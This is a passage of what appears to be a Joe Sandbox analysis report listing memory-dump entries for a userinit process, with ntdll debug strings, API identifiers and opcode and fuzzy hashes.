                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: ec98cd48d23a43dab7346314a901b6f5e905bb558682a5020633c6c0f649a734
                                                      • Instruction ID: 31e3fed4e7df569cc7267701ec784765855754a59240b513c0e3ee2c3fe53fbd
                                                      • Opcode Fuzzy Hash: ec98cd48d23a43dab7346314a901b6f5e905bb558682a5020633c6c0f649a734
                                                      • Instruction Fuzzy Hash: F62151BBE00219AFCB10DE69DC80AEFB7F8EF48650F084516E915E7200E730DA018BA1
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033902E7
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033902BD
                                                      • RTL: Re-Waiting, xrefs: 0339031E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: d89b090428c57685a8bdb1a8fa07ed8b6d94ecb411532beb38ab807d42738ef5
                                                      • Instruction ID: a92b29dfbab3abf545576f4b11bd92dea63be2f89fb19bef6bffc8410d709891
                                                      • Opcode Fuzzy Hash: d89b090428c57685a8bdb1a8fa07ed8b6d94ecb411532beb38ab807d42738ef5
                                                      • Instruction Fuzzy Hash: 8EE1AD34604741DFEB24CF28C9C4B2AB7E4FB88314F184A5AF5A58B6E1D778E844CB42
                                                      Strings
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03397B7F
                                                      • RTL: Re-Waiting, xrefs: 03397BAC
                                                      • RTL: Resource at %p, xrefs: 03397B8E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: c8e9908723aabff53649f2b796ba2f7ed6af066056a186197676af90f1ab6744
                                                      • Instruction ID: eace290b8ce83fe190a84ea7c4900b6ce20751a8a164e200ec229d3db1f76c1d
                                                      • Opcode Fuzzy Hash: c8e9908723aabff53649f2b796ba2f7ed6af066056a186197676af90f1ab6744
                                                      • Instruction Fuzzy Hash: 9541BF357017029FDB24DE29DC80F6AF7E9EB88710F140A2EF95ADB680DB71E4058B91
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0339728C
                                                      Strings
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03397294
                                                      • RTL: Re-Waiting, xrefs: 033972C1
                                                      • RTL: Resource at %p, xrefs: 033972A3
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 3bf565266642dc6dbf42f044afdcb878dcb47173d64cc09db59d229c685a60ab
                                                      • Instruction ID: d60b638742e79b2299128e9056bc4395a4d23e77828a68b47504f136bf247e8e
                                                      • Opcode Fuzzy Hash: 3bf565266642dc6dbf42f044afdcb878dcb47173d64cc09db59d229c685a60ab
                                                      • Instruction Fuzzy Hash: 3741EF75A10606AFDB20CE24CCC1F6AB7A9FF84711F14061AFC95AF680DB21E85287D1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: 0e18e2073bf3335f2f27cae44fd3173628fec8d24435a16c3eaab6ccd3344105
                                                      • Instruction ID: 7259b663a606c2b0ba5f09efffcf2a7d003487331339f1132f74c51995356a10
                                                      • Opcode Fuzzy Hash: 0e18e2073bf3335f2f27cae44fd3173628fec8d24435a16c3eaab6ccd3344105
                                                      • Instruction Fuzzy Hash: 04317877A002199FCB24DF29DC80BEFB7F8EF44650F544555EC59E7240EB309A548BA0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: b9eb1f633da6f91d85c6b3b510fc7ad473f8721411d2f73e2f830ab276c20e6f
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: B991B670E002169FDB24DF69CCC1ABEB7B9EF44724F98C61AE865EB2D8D73489418750
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: 0980444341f727beed354d78687410712a9ede203984220c69b4aefac410f947
                                                      • Instruction ID: abd6ab763e8e3c1ce21060e86242c0bfb3779ca9d0dbc3b601b996171a243492
                                                      • Opcode Fuzzy Hash: 0980444341f727beed354d78687410712a9ede203984220c69b4aefac410f947
                                                      • Instruction Fuzzy Hash: ED812975D012699BDB21DF54CC84BEEB7B8AF09710F0445EAE919B7280D7709E84CFA0
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 033ACFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Qw@4Qw
                                                      • API String ID: 4062629308-2383119779
                                                      • Opcode ID: 032f7d7fa067dccd2b767999174324da3fc2723dec0b4f7889455aeaa2db165b
                                                      • Instruction ID: 2d88d15ae8f37371ca6c187e212726f30dc63bbe372a48feac032b533f726755
                                                      • Opcode Fuzzy Hash: 032f7d7fa067dccd2b767999174324da3fc2723dec0b4f7889455aeaa2db165b
                                                      • Instruction Fuzzy Hash: A741BFB9D00A14DFCB21DF99C880AAEFBB8EF45710F05812AE914EF654D738C801DB64